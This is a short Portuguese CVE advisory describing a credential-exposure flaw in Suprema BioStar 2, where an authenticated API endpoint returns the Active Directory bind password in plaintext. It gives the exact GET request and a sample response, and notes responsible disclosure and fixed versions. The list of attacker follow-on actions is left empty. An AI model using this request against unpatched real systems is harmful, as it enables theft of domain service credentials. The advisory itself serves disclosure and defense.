
Write-up de CVE para vulnerabilidade de exposição de credenciais do Active Directory no Suprema BioStar 2
| Campo | Detalhes |
|---|---|
| ID do CVE | CVE-2026-31278 |
| Fornecedor | Suprema Inc. |
| Produto | BioStar 2 |
| Tipo de Vulnerabilidade | Divulgação de Informações Sensíveis / Exposição de Credenciais |
| Vetor de Ataque | Remoto / Autenticado / Baixa Complexidade |
| Severidade | Alta |
| Corrigido Em | BioStar 2 v2.9.12 / BioStarX v1.0.2 |
| Pesquisador | Abdullah Alannaz |
Existe uma vulnerabilidade de divulgação de informações sensíveis no Suprema BioStar 2 devido ao tratamento inadequado das configurações de integração com o Active Directory. O endpoint da API de backend /api/v2/setting/adserversetting retorna as credenciais da conta de bind do Active Directory em texto puro, apesar de a senha ser mascarada na interface administrativa.
Embora o campo de senha seja mascarado na interface administrativa, requisições autenticadas à API de backend divulgam a senha completa não criptografada, juntamente com os parâmetros de configuração do LDAP, incluindo a comunicação SSL desabilitada.
Um atacante autenticado envia uma requisição HTTP GET ao endpoint de configuração do servidor AD e recebe a senha da conta de serviço do Active Directory em texto puro na resposta do servidor.
Requisição:
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>
Resposta:
{
"ad_server": "ldap://internal.domain.local",
"bind_dn": "CN=svc_biostar,DC=domain,DC=local",
"password": "<plaintext_password_returned_here>",
"ssl_enabled": false
}
Um atacante autenticado pode aproveitar as credenciais divulgadas para:
CVE-2026-31278 atribuído pela MITRE | Correção lançada no BioStar 2 v2.9.12 / BioStarX v1.0.2 |
Abdullah Alannaz Pesquisador de Segurança
Esta vulnerabilidade foi divulgada de forma responsável à Suprema. O fornecedor confirmou o problema e coordenou com a MITRE a atribuição do CVE.